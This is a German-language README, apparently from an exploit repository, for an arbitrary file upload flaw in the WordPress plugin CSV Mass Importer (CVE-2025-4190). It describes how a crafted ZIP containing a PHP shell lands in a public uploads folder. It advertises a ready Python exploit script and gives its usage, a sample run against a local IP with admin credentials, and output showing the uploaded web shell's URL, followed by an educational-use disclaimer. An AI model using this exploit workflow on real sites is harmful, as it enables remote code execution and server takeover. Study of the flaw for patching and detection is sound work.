
CSV Mass Importer <= 1.2 - Admin+ Beliebiger Datei-Upload
Das CSV Mass Importer-Plugin (≤ 1.2) für WordPress enthält eine Admin+-Schwachstelle für beliebigen Dateiupload.
Aufgrund einer unzureichenden Validierung hochgeladener Dateien können Benutzer mit hohen Privilegien (wie Admin) beliebige Dateien auf den Server hochladen, selbst wenn dies eingeschränkt sein sollte – zum Beispiel in Multisite-Konfigurationen.
Diese Schwachstelle ermöglicht es einem Angreifer, PHP-Shells oder schädliche Dateien hochzuladen, was zu Remote-Code-Ausführung (RCE) auf dem Server führt.
Entdeckt von Nxploited (Khaled Alenazi).
Das Plugin überprüft hochgeladene Dateien bei der CSV-Importfunktion nicht ordnungsgemäß.
Eine manipulierte ZIP-Datei, die eine PHP-Shell enthält, kann hochgeladen und in ein öffentlich zugängliches Verzeichnis extrahiert werden.
Beispiel für Shell-Pfad:
<target-url>/wp-content/uploads/cmi-data/nxploited.php
Dieses Repository enthält ein fertiges Python-Exploit-Skript: 4190.py
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL
--username, -un USERNAME
WordPress admin username
--password, -p PASSWORD
WordPress admin password
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)
Dieser Code wird ausschließlich zu Bildungszwecken bereitgestellt.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.
Verwenden Sie es verantwortungsvoll und nur auf Systemen, die Sie testen dürfen.
Entdeckt und entwickelt von Khaled Alenazi (Nxploited) 🌟